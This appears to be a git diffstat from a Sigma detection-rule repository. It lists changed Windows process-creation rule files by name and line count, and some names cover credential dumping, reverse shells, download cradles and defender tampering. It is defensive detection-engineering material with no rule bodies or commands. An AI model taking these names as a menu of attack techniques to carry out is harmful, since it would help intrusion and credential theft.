.../proc_creation_win_cmd_del_execution.yml | 33 +- ...c_creation_win_cmd_del_greedy_deletion.yml | 14 +- .../proc_creation_win_cmd_dir_execution.yml | 5 +- .../proc_creation_win_cmd_dosfuscation.yml | 5 +- .../proc_creation_win_cmd_http_appdata.yml | 8 +- .../proc_creation_win_cmd_mklink_osk_cmd.yml | 11 +- ...md_mklink_shadow_copies_access_symlink.yml | 5 +- ...reation_win_cmd_net_use_and_exec_combo.yml | 12 +- ...oc_creation_win_cmd_no_space_execution.yml | 33 +- ...oc_creation_win_cmd_ntdllpipe_redirect.yml | 6 +- .../proc_creation_win_cmd_path_traversal.yml | 31 +- ...n_win_cmd_ping_copy_combined_execution.yml | 14 +- ...on_win_cmd_ping_del_combined_execution.yml | 16 +- .../proc_creation_win_cmd_redirect.yml | 18 +- ...eation_win_cmd_redirection_susp_folder.yml | 28 +- .../proc_creation_win_cmd_rmdir_execution.yml | 23 +- ...roc_creation_win_cmd_shadowcopy_access.yml | 7 +- .../proc_creation_win_cmd_stdin_redirect.yml | 10 +- ...cmd_sticky_key_like_backdoor_execution.yml | 10 +- ...c_creation_win_cmd_sticky_keys_replace.yml | 10 +- ...eation_win_cmdkey_adding_generic_creds.yml | 9 +- .../proc_creation_win_cmdkey_recon.yml | 9 +- ...eation_win_cmstp_execution_by_creation.yml | 4 +- ...roc_creation_win_conhost_legacy_option.yml | 6 +- ...oc_creation_win_conhost_path_traversal.yml | 5 +- ...reation_win_conhost_susp_child_process.yml | 10 +- ...c_creation_win_conhost_uncommon_parent.yml | 11 +- .../proc_creation_win_control_panel_item.yml | 15 +- ...eation_win_createdump_lolbin_execution.yml | 14 +- ...ation_win_csc_susp_dynamic_compilation.yml | 55 +- .../proc_creation_win_csc_susp_parent.yml | 66 +- .../proc_creation_win_csi_execution.yml | 18 +- ...creation_win_csi_use_of_csharp_console.yml | 3 +- .../proc_creation_win_csvde_export.yml | 11 +- ...roc_creation_win_curl_cookie_hijacking.yml | 11 +- ...oc_creation_win_curl_custom_user_agent.yml | 12 +- ...ation_win_curl_download_direct_ip_exec.yml | 19 +- ...url_download_direct_ip_susp_extensions.yml | 18 +- ...url_download_susp_file_sharing_domains.yml | 19 +- ..._creation_win_curl_insecure_connection.yml | 8 +- ...reation_win_curl_insecure_porxy_or_doh.yml | 9 +- ...proc_creation_win_curl_local_file_read.yml | 9 +- .../proc_creation_win_curl_susp_download.yml | 26 +- ...desktopimgdownldr_remote_file_download.yml | 6 +- ...n_win_desktopimgdownldr_susp_execution.yml | 12 +- ...ion_win_deviceenroller_dll_sideloading.yml | 20 +- ...proc_creation_win_devinit_lolbin_usage.yml | 6 +- ...n_win_dfsvc_suspicious_child_processes.yml | 4 +- .../proc_creation_win_dirlister_execution.yml | 8 +- ...tion_win_diskshadow_child_process_susp.yml | 24 +- ...on_win_diskshadow_script_mode_susp_ext.yml | 36 +- ...n_diskshadow_script_mode_susp_location.yml | 31 +- ..._creation_win_dll_sideload_vmware_xfer.yml | 5 +- ..._creation_win_dllhost_no_cli_execution.yml | 8 +- ...n_win_dns_exfiltration_tools_execution.yml | 4 +- ...oc_creation_win_dns_susp_child_process.yml | 4 +- .../proc_creation_win_dnscmd_discovery.yml | 5 +- ...md_install_new_server_level_plugin_dll.yml | 14 +- ...tion_win_dotnet_trace_lolbin_execution.yml | 6 +- .../proc_creation_win_driverquery_recon.yml | 31 +- .../proc_creation_win_driverquery_usage.yml | 35 +- ..._creation_win_dsacls_abuse_permissions.yml | 8 +- ...roc_creation_win_dsacls_password_spray.yml | 6 +- .../proc_creation_win_dsim_remove.yml | 13 +- ...ion_win_dsquery_domain_trust_discovery.yml | 14 +- .../proc_creation_win_dtrace_kernel_dump.yml | 7 +- ...oc_creation_win_dumpminitool_execution.yml | 21 +- ...eation_win_dumpminitool_susp_execution.yml | 27 +- .../proc_creation_win_esentutl_params.yml | 6 +- ...ation_win_esentutl_sensitive_file_copy.yml | 16 +- .../proc_creation_win_esentutl_webcache.yml | 11 +- ...eation_win_eventvwr_susp_child_process.yml | 7 +- ...proc_creation_win_expand_cabinet_files.yml | 31 +- ...eation_win_explorer_break_process_tree.yml | 24 +- ...creation_win_explorer_lolbin_execution.yml | 2 +- .../proc_creation_win_explorer_nouaccheck.yml | 10 +- .../proc_creation_win_findstr_download.yml | 26 +- ...roc_creation_win_findstr_gpp_passwords.yml | 17 +- .../proc_creation_win_findstr_lnk.yml | 17 +- .../proc_creation_win_findstr_lsass.yml | 19 +- ...oc_creation_win_findstr_recon_everyone.yml | 28 +- ...creation_win_findstr_recon_pipe_output.yml | 15 +- ...on_win_findstr_security_keyword_lookup.yml | 31 +- ..._creation_win_findstr_subfolder_search.yml | 25 +- ..._sysmon_discovery_via_default_altitude.yml | 18 +- .../proc_creation_win_finger_usage.yml | 7 +- .../proc_creation_win_fltmc_unload_driver.yml | 13 +- ...reation_win_fltmc_unload_driver_sysmon.yml | 10 +- ...in_forfiles_child_process_masquerading.yml | 12 +- ...creation_win_forfiles_proxy_execution_.yml | 27 +- ..._creation_win_fsutil_drive_enumeration.yml | 6 +- ..._creation_win_fsutil_symlinkevaluation.yml | 16 +- .../proc_creation_win_fsutil_usage.yml | 19 +- ...ownloadwrapper_arbitrary_file_download.yml | 7 +- .../proc_creation_win_git_susp_clone.yml | 17 +- ...on_win_googleupdate_susp_child_process.yml | 17 +- .../proc_creation_win_gpg4win_decryption.yml | 10 +- .../proc_creation_win_gpg4win_encryption.yml | 10 +- ...reation_win_gpg4win_portable_execution.yml | 13 +- ...roc_creation_win_gpg4win_susp_location.yml | 17 +- .../proc_creation_win_gpresult_execution.yml | 5 +- ...ion_win_gup_arbitrary_binary_execution.yml | 7 +- .../proc_creation_win_gup_download.yml | 12 +- ..._creation_win_gup_suspicious_execution.yml | 3 +- .../proc_creation_win_hh_chm_execution.yml | 6 +- ...in_hh_chm_remote_download_or_execution.yml | 9 +- .../proc_creation_win_hh_susp_execution.yml | 11 +- .../proc_creation_win_hktl_adcspwn.yml | 6 +- ...reation_win_hktl_bloodhound_sharphound.yml | 25 +- ..._creation_win_hktl_c3_rundll32_pattern.yml | 2 +- .../proc_creation_win_hktl_certify.yml | 13 +- .../proc_creation_win_hktl_certipy.yml | 13 +- ...ion_win_hktl_cobaltstrike_bloopers_cmd.yml | 15 +- ...win_hktl_cobaltstrike_bloopers_modules.yml | 10 +- ...win_hktl_cobaltstrike_load_by_rundll32.yml | 17 +- ...win_hktl_cobaltstrike_process_patterns.yml | 8 +- .../proc_creation_win_hktl_coercedpotato.yml | 18 +- .../proc_creation_win_hktl_covenant.yml | 6 +- ...eation_win_hktl_crackmapexec_execution.yml | 21 +- ...n_hktl_crackmapexec_execution_patterns.yml | 7 +- ...reation_win_hktl_crackmapexec_patterns.yml | 13 +- ...tl_crackmapexec_powershell_obfuscation.yml | 20 +- .../proc_creation_win_hktl_createminidump.yml | 9 +- .../proc_creation_win_hktl_dinjector.yml | 7 +- .../proc_creation_win_hktl_dumpert.yml | 7 +- .../proc_creation_win_hktl_edrsilencer.yml | 13 +- ...tion_win_hktl_empire_powershell_launch.yml | 2 +- ..._win_hktl_empire_powershell_uac_bypass.yml | 2 +- .../proc_creation_win_hktl_evil_winrm.yml | 6 +- ...ation_win_hktl_execution_via_imphashes.yml | 355 +- ...ion_win_hktl_execution_via_pe_metadata.yml | 5 +- .../proc_creation_win_hktl_gmer.yml | 6 +- .../proc_creation_win_hktl_handlekatz.yml | 21 +- .../proc_creation_win_hktl_hashcat.yml | 5 +- ...c_creation_win_hktl_htran_or_natbypass.yml | 5 +- .../proc_creation_win_hktl_hydra.yml | 7 +- ...ion_win_hktl_impacket_lateral_movement.yml | 38 +- .../proc_creation_win_hktl_impacket_tools.yml | 92 +- .../proc_creation_win_hktl_impersonate.yml | 13 +- .../proc_creation_win_hktl_inveigh.yml | 25 +- ...ation_win_hktl_invoke_obfuscation_clip.yml | 9 +- ...obfuscation_obfuscated_iex_commandline.yml | 17 +- ...tion_win_hktl_invoke_obfuscation_stdin.yml | 17 +- ...eation_win_hktl_invoke_obfuscation_var.yml | 9 +- ...n_hktl_invoke_obfuscation_via_compress.yml | 6 +- ..._win_hktl_invoke_obfuscation_via_stdin.yml | 7 +- ...n_hktl_invoke_obfuscation_via_use_clip.yml | 9 +- ..._hktl_invoke_obfuscation_via_use_mhsta.yml | 4 +- ...on_win_hktl_invoke_obfuscation_via_var.yml | 9 +- ...eation_win_hktl_jlaive_batch_execution.yml | 6 +- .../proc_creation_win_hktl_koadic.yml | 6 +- .../proc_creation_win_hktl_krbrelay.yml | 10 +- .../proc_creation_win_hktl_krbrelayup.yml | 13 +- .../proc_creation_win_hktl_localpotato.yml | 5 +- ...reation_win_hktl_meterpreter_getsystem.yml | 19 +- ...reation_win_hktl_mimikatz_command_line.yml | 33 +- .../proc_creation_win_hktl_pchunter.yml | 31 +- ...tl_powersploit_empire_default_schtasks.yml | 4 +- .../proc_creation_win_hktl_powertool.yml | 12 +- ...eation_win_hktl_purplesharp_indicators.yml | 6 +- .../proc_creation_win_hktl_pypykatz.yml | 6 +- .../proc_creation_win_hktl_quarks_pwdump.yml | 2 +- ...on_win_hktl_redmimicry_winnti_playbook.yml | 5 +- ..._creation_win_hktl_relay_attacks_tools.yml | 17 +- .../proc_creation_win_hktl_rubeus.yml | 45 +- .../proc_creation_win_hktl_safetykatz.yml | 9 +- .../proc_creation_win_hktl_secutyxploded.yml | 6 +- .../proc_creation_win_hktl_selectmyparent.yml | 61 +- .../proc_creation_win_hktl_sharp_chisel.yml | 9 +- ..._creation_win_hktl_sharp_impersonation.yml | 29 +- ...c_creation_win_hktl_sharp_ldap_monitor.yml | 9 +- .../proc_creation_win_hktl_sharpersist.yml | 15 +- .../proc_creation_win_hktl_sharpevtmute.yml | 17 +- ...proc_creation_win_hktl_sharpldapwhoami.yml | 11 +- .../proc_creation_win_hktl_sharpup.yml | 20 +- .../proc_creation_win_hktl_sharpview.yml | 203 +- ...creation_win_hktl_silenttrinity_stager.yml | 4 +- ...n_win_hktl_sliver_c2_execution_pattern.yml | 5 +- ...ation_win_hktl_stracciatella_execution.yml | 23 +- .../proc_creation_win_hktl_sysmoneop.yml | 12 +- .../proc_creation_win_hktl_trufflesnout.yml | 7 +- .../proc_creation_win_hktl_uacme.yml | 29 +- .../proc_creation_win_hktl_wce.yml | 14 +- .../proc_creation_win_hktl_winpeas.yml | 43 +- .../proc_creation_win_hktl_winpwn.yml | 12 +- ...on_win_hktl_wmiexec_default_powershell.yml | 5 +- .../proc_creation_win_hktl_xordump.yml | 12 +- .../proc_creation_win_hktl_zipexec.yml | 7 +- .../proc_creation_win_hwp_exploits.yml | 3 +- .../proc_creation_win_hxtsr_masquerading.yml | 15 +- .../proc_creation_win_icacls_deny.yml | 11 +- .../proc_creation_win_ieexec_download.yml | 6 +- ...c_creation_win_iis_appcmd_http_logging.yml | 9 +- ...appcmd_service_account_password_dumped.yml | 24 +- ...ion_win_iis_appcmd_susp_module_install.yml | 11 +- ...ation_win_iis_appcmd_susp_rewrite_rule.yml | 10 +- ..._win_iis_connection_strings_decryption.yml | 11 +- ...ation_win_iis_susp_module_registration.yml | 9 +- ...ion_win_imagingdevices_unusual_parents.yml | 5 +- .../proc_creation_win_imewbdld_download.yml | 11 +- ..._infdefaultinstall_execute_sct_scripts.yml | 5 +- ...proc_creation_win_installutil_download.yml | 12 +- ...eation_win_instalutil_no_log_execution.yml | 5 +- ...on_win_java_keytool_susp_child_process.yml | 3 +- ...n_java_manageengine_susp_child_process.yml | 13 +- ...roc_creation_win_java_remote_debugging.yml | 9 +- ...c_creation_win_java_susp_child_process.yml | 9 +- ...creation_win_java_susp_child_process_2.yml | 11 +- ...n_java_sysaidserver_susp_child_process.yml | 3 +- .../proc_creation_win_kd_execution.yml | 7 +- ...on_win_ksetup_password_change_computer.yml | 9 +- ...eation_win_ksetup_password_change_user.yml | 6 +- .../proc_creation_win_ldifde_export.yml | 11 +- .../proc_creation_win_ldifde_file_load.yml | 13 +- ...n_lodctr_performance_counter_tampering.yml | 7 +- ...c_creation_win_logman_disable_eventlog.yml | 13 +- .../proc_creation_win_lolbin_cdb.yml | 11 +- ...creation_win_lolbin_class_exec_xwizard.yml | 7 +- .../proc_creation_win_lolbin_cmdl32.yml | 6 +- ...eation_win_lolbin_configsecuritypolicy.yml | 11 +- ...oc_creation_win_lolbin_customshellhost.yml | 3 +- ...data_exfiltration_by_using_datasvcutil.yml | 13 +- ...eation_win_lolbin_dctask64_proc_inject.yml | 2 +- .../proc_creation_win_lolbin_defaultpack.yml | 3 +- ...in_lolbin_device_credential_deployment.yml | 3 +- ...c_creation_win_lolbin_devtoolslauncher.yml | 2 +- .../proc_creation_win_lolbin_diantz_ads.yml | 7 +- ..._creation_win_lolbin_diantz_remote_cab.yml | 5 +- ...eation_win_lolbin_dll_sideload_xwizard.yml | 3 +- .../proc_creation_win_lolbin_dotnet.yml | 6 +- .../proc_creation_win_lolbin_dotnet_dump.yml | 13 +- .../proc_creation_win_lolbin_dump64.yml | 8 +- .../proc_creation_win_lolbin_extexport.yml | 9 +- .../proc_creation_win_lolbin_extrac32.yml | 10 +- .../proc_creation_win_lolbin_extrac32_ads.yml | 4 +- .../proc_creation_win_lolbin_format.yml | 8 +- ...reation_win_lolbin_fsharp_interpreters.yml | 11 +- .../proc_creation_win_lolbin_ftp.yml | 9 +- ...reation_win_lolbin_gather_network_info.yml | 25 +- .../proc_creation_win_lolbin_gpscript.yml | 9 +- .../proc_creation_win_lolbin_ie4uinit.yml | 12 +- .../proc_creation_win_lolbin_ilasm.yml | 4 +- .../proc_creation_win_lolbin_jsc.yml | 5 +- .../proc_creation_win_lolbin_kavremover.yml | 10 +- ..._creation_win_lolbin_launch_vsdevshell.yml | 7 +- .../proc_creation_win_lolbin_manage_bde.yml | 12 +- ...win_lolbin_mavinject_process_injection.yml | 13 +- .../proc_creation_win_lolbin_mpiexec.yml | 11 +- .../proc_creation_win_lolbin_msdeploy.yml | 2 +- ...c_creation_win_lolbin_msdt_answer_file.yml | 8 +- .../proc_creation_win_lolbin_openconsole.yml | 9 +- .../proc_creation_win_lolbin_openwith.yml | 2 +- .../proc_creation_win_lolbin_pcalua.yml | 13 +- .../proc_creation_win_lolbin_pcwrun.yml | 6 +- ...roc_creation_win_lolbin_pcwrun_follina.yml | 5 +- .../proc_creation_win_lolbin_pcwutl.yml | 9 +- .../proc_creation_win_lolbin_pester.yml | 7 +- .../proc_creation_win_lolbin_pester_1.yml | 9 +- .../proc_creation_win_lolbin_printbrm.yml | 5 +- .../proc_creation_win_lolbin_pubprn.yml | 5 +- ...tion_win_lolbin_rasautou_dll_execution.yml | 14 +- .../proc_creation_win_lolbin_register_app.yml | 8 +- .../proc_creation_win_lolbin_remote.yml | 7 +- .../proc_creation_win_lolbin_replace.yml | 5 +- .../proc_creation_win_lolbin_runexehelper.yml | 3 +- ...oc_creation_win_lolbin_runscripthelper.yml | 2 +- .../proc_creation_win_lolbin_scriptrunner.yml | 9 +- .../proc_creation_win_lolbin_setres.yml | 4 +- .../proc_creation_win_lolbin_sftp.yml | 10 +- ...eation_win_lolbin_sideload_link_binary.yml | 7 +- .../proc_creation_win_lolbin_sigverif.yml | 3 +- .../proc_creation_win_lolbin_ssh.yml | 9 +- ...eation_win_lolbin_susp_acccheckconsole.yml | 9 +- ...proc_creation_win_lolbin_susp_atbroker.yml | 4 +- ...ation_win_lolbin_susp_certreq_download.yml | 9 +- ...olbin_susp_driver_installed_by_pnputil.yml | 11 +- .../proc_creation_win_lolbin_susp_dxcap.yml | 6 +- .../proc_creation_win_lolbin_susp_grpconv.yml | 5 +- ...ion_win_lolbin_susp_sqldumper_activity.yml | 2 +- ...n_syncappvpublishingserver_execute_psh.yml | 10 +- ...ncappvpublishingserver_vbs_execute_psh.yml | 4 +- .../proc_creation_win_lolbin_tracker.yml | 12 +- .../proc_creation_win_lolbin_ttdinject.yml | 7 +- ..._creation_win_lolbin_tttracer_mod_load.yml | 9 +- .../proc_creation_win_lolbin_type.yml | 10 +- .../proc_creation_win_lolbin_unregmp2.yml | 9 +- ...c_creation_win_lolbin_utilityfunctions.yml | 5 +- ...ation_win_lolbin_visual_basic_compiler.yml | 5 +- ...ation_win_lolbin_visualuiaverifynative.yml | 7 +- ...c_creation_win_lolbin_vsiisexelauncher.yml | 9 +- .../proc_creation_win_lolbin_wfc.yml | 7 +- .../proc_creation_win_lolbin_wlrmdr.yml | 12 +- ..._creation_win_lolbin_workflow_compiler.yml | 7 +- ...oc_creation_win_lolscript_register_app.yml | 19 +- .../proc_creation_win_lsass_process_clone.yml | 3 +- ..._creation_win_malware_conti_shadowcopy.yml | 9 +- ...oc_creation_win_malware_script_dropper.yml | 4 +- ...roc_creation_win_mftrace_child_process.yml | 3 +- ...reation_win_mmc_mmc20_lateral_movement.yml | 6 +- ...oc_creation_win_mmc_susp_child_process.yml | 22 +- .../proc_creation_win_mofcomp_execution.yml | 55 +- ...ion_win_mpcmdrun_dll_sideload_defender.yml | 7 +- ...n_win_mpcmdrun_download_arbitrary_file.yml | 10 +- ...run_remove_windows_defender_definition.yml | 9 +- ...eation_win_msbuild_susp_parent_process.yml | 4 +- ...n_win_msdt_arbitrary_command_execution.yml | 16 +- ...roc_creation_win_msdt_susp_cab_options.yml | 13 +- .../proc_creation_win_msdt_susp_parent.yml | 8 +- ...roc_creation_win_msedge_proxy_download.yml | 6 +- .../proc_creation_win_mshta_http.yml | 10 +- ...roc_creation_win_mshta_inline_vbscript.yml | 8 +- .../proc_creation_win_mshta_javascript.yml | 6 +- ...creation_win_mshta_lethalhta_technique.yml | 3 +- ...reation_win_mshta_susp_child_processes.yml | 45 +- ...proc_creation_win_mshta_susp_execution.yml | 10 +- .../proc_creation_win_mshta_susp_pattern.yml | 32 +- .../proc_creation_win_msiexec_dll.yml | 8 +- .../proc_creation_win_msiexec_embedding.yml | 13 +- .../proc_creation_win_msiexec_execute_dll.yml | 17 +- ...roc_creation_win_msiexec_install_quiet.yml | 20 +- ...oc_creation_win_msiexec_install_remote.yml | 16 +- ...proc_creation_win_msiexec_masquerading.yml | 4 +- .../proc_creation_win_msiexec_web_install.yml | 9 +- .../proc_creation_win_msohtmed_download.yml | 6 +- .../proc_creation_win_mspub_download.yml | 9 +- ...oc_creation_win_msra_process_injection.yml | 5 +- ...reation_win_mssql_sqlps_susp_execution.yml | 21 +- ...on_win_mssql_sqltoolsps_susp_execution.yml | 20 +- ..._creation_win_mssql_susp_child_process.yml | 10 +- ...n_win_mssql_veaam_susp_child_processes.yml | 9 +- ...reation_win_mstsc_rdp_hijack_shadowing.yml | 2 +- ...c_creation_win_mstsc_remote_connection.yml | 19 +- ..._creation_win_mstsc_run_local_rdp_file.yml | 8 +- ...mstsc_run_local_rdp_file_susp_location.yml | 15 +- ...n_mstsc_run_local_rpd_file_susp_parent.yml | 9 +- .../proc_creation_win_msxsl_execution.yml | 12 +- ...oc_creation_win_msxsl_remote_execution.yml | 5 +- ..._win_net_default_accounts_manipulation.yml | 78 +- ...tion_win_net_groups_and_accounts_recon.yml | 48 +- ..._win_net_network_connections_discovery.yml | 28 +- ...eation_win_net_share_and_sessions_enum.yml | 19 +- .../proc_creation_win_net_share_unmount.yml | 18 +- .../proc_creation_win_net_start_service.yml | 17 +- .../proc_creation_win_net_stop_service.yml | 21 +- .../proc_creation_win_net_susp_execution.yml | 20 +- ...creation_win_net_use_mount_admin_share.yml | 21 +- ...ation_win_net_use_mount_internet_share.yml | 17 +- .../proc_creation_win_net_use_mount_share.yml | 18 +- ...reation_win_net_use_password_plaintext.yml | 16 +- .../proc_creation_win_net_user_add.yml | 18 +- ...creation_win_net_user_add_never_expire.yml | 21 +- .../proc_creation_win_netsh_fw_add_rule.yml | 14 +- ...etsh_fw_allow_program_in_susp_location.yml | 31 +- .../proc_creation_win_netsh_fw_allow_rdp.yml | 14 +- ...proc_creation_win_netsh_fw_delete_rule.yml | 11 +- .../proc_creation_win_netsh_fw_disable.yml | 12 +- ...reation_win_netsh_fw_enable_group_rule.yml | 9 +- ..._creation_win_netsh_fw_rules_discovery.yml | 11 +- .../proc_creation_win_netsh_fw_set_rule.yml | 11 +- ...ation_win_netsh_helper_dll_persistence.yml | 21 +- ...proc_creation_win_netsh_packet_capture.yml | 9 +- ...roc_creation_win_netsh_port_forwarding.yml | 25 +- ...reation_win_netsh_port_forwarding_3389.yml | 9 +- ...n_win_netsh_wifi_credential_harvesting.yml | 6 +- .../proc_creation_win_nltest_execution.yml | 12 +- .../proc_creation_win_nltest_recon.yml | 40 +- .../proc_creation_win_node_abuse.yml | 9 +- ...on_win_node_adobe_creative_cloud_abuse.yml | 5 +- ...creation_win_nslookup_domain_discovery.yml | 8 +- ...eation_win_nslookup_poweshell_download.yml | 17 +- .../proc_creation_win_ntdsutil_susp_usage.yml | 28 +- .../proc_creation_win_ntdsutil_usage.yml | 3 +- ...c_creation_win_odbcconf_driver_install.yml | 18 +- ...ation_win_odbcconf_driver_install_susp.yml | 17 +- ...ation_win_odbcconf_exec_susp_locations.yml | 10 +- ...ation_win_odbcconf_register_dll_regsvr.yml | 22 +- ..._win_odbcconf_register_dll_regsvr_susp.yml | 17 +- ...oc_creation_win_odbcconf_response_file.yml | 27 +- ...eation_win_odbcconf_response_file_susp.yml | 22 +- ...on_win_odbcconf_uncommon_child_process.yml | 7 +- ...tion_win_office_arbitrary_cli_download.yml | 22 +- ...win_office_excel_dcom_lateral_movement.yml | 22 +- ...win_office_exec_from_trusted_locations.yml | 27 +- ...in_office_onenote_susp_child_processes.yml | 160 +- ...utlook_enable_unsafe_client_mail_rules.yml | 9 +- ...in_office_outlook_susp_child_processes.yml | 32 +- ...ce_outlook_susp_child_processes_remote.yml | 7 +- ..._office_spawn_exe_from_users_directory.yml | 4 +- ...eation_win_office_susp_child_processes.yml | 168 +- ...c_creation_win_office_winword_dll_load.yml | 13 +- ...flinescannershell_mpclient_sideloading.yml | 16 +- .../proc_creation_win_pdqdeploy_execution.yml | 12 +- ...ion_win_pdqdeploy_runner_susp_children.yml | 68 +- ...tion_win_perl_inline_command_execution.yml | 9 +- ...ation_win_php_inline_command_execution.yml | 9 +- .../proc_creation_win_ping_hex_ip.yml | 2 +- .../proc_creation_win_pktmon_execution.yml | 4 +- ...roc_creation_win_plink_port_forwarding.yml | 2 +- ...proc_creation_win_plink_susp_tunneling.yml | 10 +- .../proc_creation_win_powercfg_execution.yml | 26 +- ...ershell_aadinternals_cmdlets_execution.yml | 23 +- ...ell_active_directory_module_dll_import.yml | 27 +- ..._win_powershell_add_windows_capability.yml | 26 +- ...win_powershell_amsi_init_failed_bypass.yml | 11 +- ...n_win_powershell_amsi_null_bits_bypass.yml | 9 +- ..._creation_win_powershell_audio_capture.yml | 5 +- ...tion_win_powershell_base64_encoded_cmd.yml | 31 +- ...win_powershell_base64_frombase64string.yml | 14 +- ...roc_creation_win_powershell_base64_iex.yml | 49 +- ..._creation_win_powershell_base64_invoke.yml | 23 +- ...ion_win_powershell_base64_mppreference.yml | 40 +- ...rshell_base64_reflection_assembly_load.yml | 10 +- ...base64_reflection_assembly_load_obfusc.yml | 15 +- ...tion_win_powershell_base64_wmi_classes.yml | 34 +- ..._creation_win_powershell_cl_invocation.yml | 6 +- ...reation_win_powershell_cl_loadassembly.yml | 7 +- ...ation_win_powershell_cl_mutexverifiers.yml | 12 +- ...ershell_cmdline_convertto_securestring.yml | 17 +- ...in_powershell_cmdline_reversed_strings.yml | 24 +- ..._powershell_cmdline_special_characters.yml | 29 +- ...hell_computer_discovery_get_adcomputer.yml | 26 +- ...creation_win_powershell_create_service.yml | 6 +- ...oc_creation_win_powershell_decode_gzip.yml | 6 +- ...reation_win_powershell_decrypt_pattern.yml | 27 +- ...in_powershell_defender_disable_feature.yml | 14 +- ...tion_win_powershell_defender_exclusion.yml | 11 +- ...isable_defender_av_security_monitoring.yml | 31 +- ...eation_win_powershell_disable_firewall.yml | 22 +- ...ion_win_powershell_disable_ie_features.yml | 9 +- ..._creation_win_powershell_dll_execution.yml | 25 +- ...eation_win_powershell_downgrade_attack.yml | 9 +- ...on_win_powershell_download_com_cradles.yml | 11 +- ...eation_win_powershell_download_cradles.yml | 2 +- ...c_creation_win_powershell_download_dll.yml | 7 +- ...c_creation_win_powershell_download_iex.yml | 7 +- ...ation_win_powershell_download_patterns.yml | 23 +- ...oc_creation_win_powershell_email_exfil.yml | 2 +- ...l_enable_susp_windows_optional_feature.yml | 19 +- .../proc_creation_win_powershell_encode.yml | 4 +- ...on_win_powershell_encoded_cmd_patterns.yml | 22 +- ...creation_win_powershell_encoded_obfusc.yml | 13 +- ...ation_win_powershell_encoding_patterns.yml | 30 +- ...creation_win_powershell_exec_data_file.yml | 6 +- ...tion_win_powershell_export_certificate.yml | 13 +- ...eation_win_powershell_frombase64string.yml | 5 +- ...in_powershell_frombase64string_archive.yml | 9 +- ..._creation_win_powershell_get_clipboard.yml | 6 +- ...powershell_get_localgroup_member_recon.yml | 21 +- ...eation_win_powershell_getprocess_lsass.yml | 6 +- ...creation_win_powershell_hidden_b64_cmd.yml | 19 +- ...wershell_hide_services_via_set_service.yml | 21 +- ...c_creation_win_powershell_iex_patterns.yml | 6 +- ..._powershell_import_cert_susp_locations.yml | 7 +- ...win_powershell_import_module_susp_dirs.yml | 7 +- ...ershell_install_unsigned_appx_packages.yml | 23 +- ...ion_win_powershell_invocation_specific.yml | 26 +- ...powershell_invoke_webrequest_direct_ip.yml | 21 +- ..._powershell_invoke_webrequest_download.yml | 26 +- ...ion_win_powershell_mailboxexport_share.yml | 5 +- ...ation_win_powershell_malicious_cmdlets.yml | 27 +- ..._powershell_msexchange_transport_agent.yml | 9 +- ...n_powershell_non_interactive_execution.yml | 26 +- ...on_win_powershell_obfuscation_via_utf8.yml | 2 +- ..._creation_win_powershell_public_folder.yml | 5 +- ...wershell_remotefxvgpudisablement_abuse.yml | 18 +- ...in_powershell_reverse_shell_connection.yml | 18 +- ...ion_win_powershell_run_script_from_ads.yml | 2 +- ...owershell_run_script_from_input_stream.yml | 2 +- ...roc_creation_win_powershell_sam_access.yml | 4 +- ...on_win_powershell_script_engine_parent.yml | 3 +- ..._service_dacl_modification_set_service.yml | 18 +- .../proc_creation_win_powershell_set_acl.yml | 26 +- ...n_win_powershell_set_acl_susp_location.yml | 34 +- ...ershell_set_policies_to_unsecure_level.yml | 31 +- ...on_win_powershell_set_service_disabled.yml | 11 +- ...ion_win_powershell_shadowcopy_deletion.yml | 18 +- ...reation_win_powershell_snapins_hafnium.yml | 23 +- ...c_creation_win_powershell_stop_service.yml | 21 +- ...on_win_powershell_susp_child_processes.yml | 8 +- ..._win_powershell_susp_download_patterns.yml | 10 +- ...in_powershell_susp_parameter_variation.yml | 5 +- ...ion_win_powershell_susp_parent_process.yml | 76 +- ...reation_win_powershell_susp_ps_appdata.yml | 9 +- ...on_win_powershell_susp_ps_downloadfile.yml | 5 +- ...ll_tamper_defender_remove_mppreference.yml | 11 +- ...ation_win_powershell_token_obfuscation.yml | 16 +- ...n_powershell_user_discovery_get_aduser.yml | 26 +- ...eation_win_powershell_webclient_casing.yml | 18 +- ...creation_win_powershell_x509enrollment.yml | 6 +- ...reation_win_powershell_xor_commandline.yml | 27 +- ...c_creation_win_powershell_zip_compress.yml | 28 +- ...creation_win_presentationhost_download.yml | 9 +- ...resentationhost_uncommon_location_exec.yml | 15 +- ...ation_win_pressanykey_lolbin_execution.yml | 10 +- ...oc_creation_win_print_remote_file_copy.yml | 6 +- ..._creation_win_protocolhandler_download.yml | 12 +- ...reation_win_provlaunch_potential_abuse.yml | 54 +- ...tion_win_provlaunch_susp_child_process.yml | 53 +- ...c_creation_win_psr_capture_screenshots.yml | 5 +- ...proc_creation_win_pua_3proxy_execution.yml | 4 +- ...oc_creation_win_pua_adfind_enumeration.yml | 19 +- ...roc_creation_win_pua_adfind_susp_usage.yml | 13 +- ...c_creation_win_pua_advanced_ip_scanner.yml | 11 +- ...creation_win_pua_advanced_port_scanner.yml | 8 +- .../proc_creation_win_pua_advancedrun.yml | 20 +- ...creation_win_pua_advancedrun_priv_user.yml | 29 +- .../proc_creation_win_pua_chisel.yml | 8 +- .../proc_creation_win_pua_cleanwipe.yml | 6 +- .../proc_creation_win_pua_crassus.yml | 9 +- .../proc_creation_win_pua_csexec.yml | 3 +- .../proc_creation_win_pua_defendercheck.yml | 8 +- .../proc_creation_win_pua_ditsnap.yml | 7 +- .../proc_creation_win_pua_frp.yml | 20 +- .../proc_creation_win_pua_iox.yml | 20 +- ...c_creation_win_pua_mouselock_execution.yml | 10 +- .../proc_creation_win_pua_netcat.yml | 9 +- .../proc_creation_win_pua_ngrok.yml | 15 +- .../proc_creation_win_pua_nimgrab.yml | 9 +- .../proc_creation_win_pua_nircmd.yml | 13 +- ...proc_creation_win_pua_nircmd_as_system.yml | 2 +- .../proc_creation_win_pua_nmap_zenmap.yml | 16 +- .../proc_creation_win_pua_nps.yml | 22 +- .../proc_creation_win_pua_nsudo.yml | 32 +- .../proc_creation_win_pua_pingcastle.yml | 317 +- ...ation_win_pua_pingcastle_script_parent.yml | 86 +- .../proc_creation_win_pua_process_hacker.yml | 56 +- .../proc_creation_win_pua_radmin.yml | 9 +- ...proc_creation_win_pua_rcedit_execution.yml | 21 +- ...proc_creation_win_pua_rclone_execution.yml | 19 +- .../proc_creation_win_pua_runxcmd.yml | 7 +- .../proc_creation_win_pua_seatbelt.yml | 44 +- .../proc_creation_win_pua_system_informer.yml | 28 +- ...oc_creation_win_pua_webbrowserpassview.yml | 9 +- ..._creation_win_pua_wsudo_susp_execution.yml | 14 +- .../proc_creation_win_python_adidnsdump.yml | 9 +- 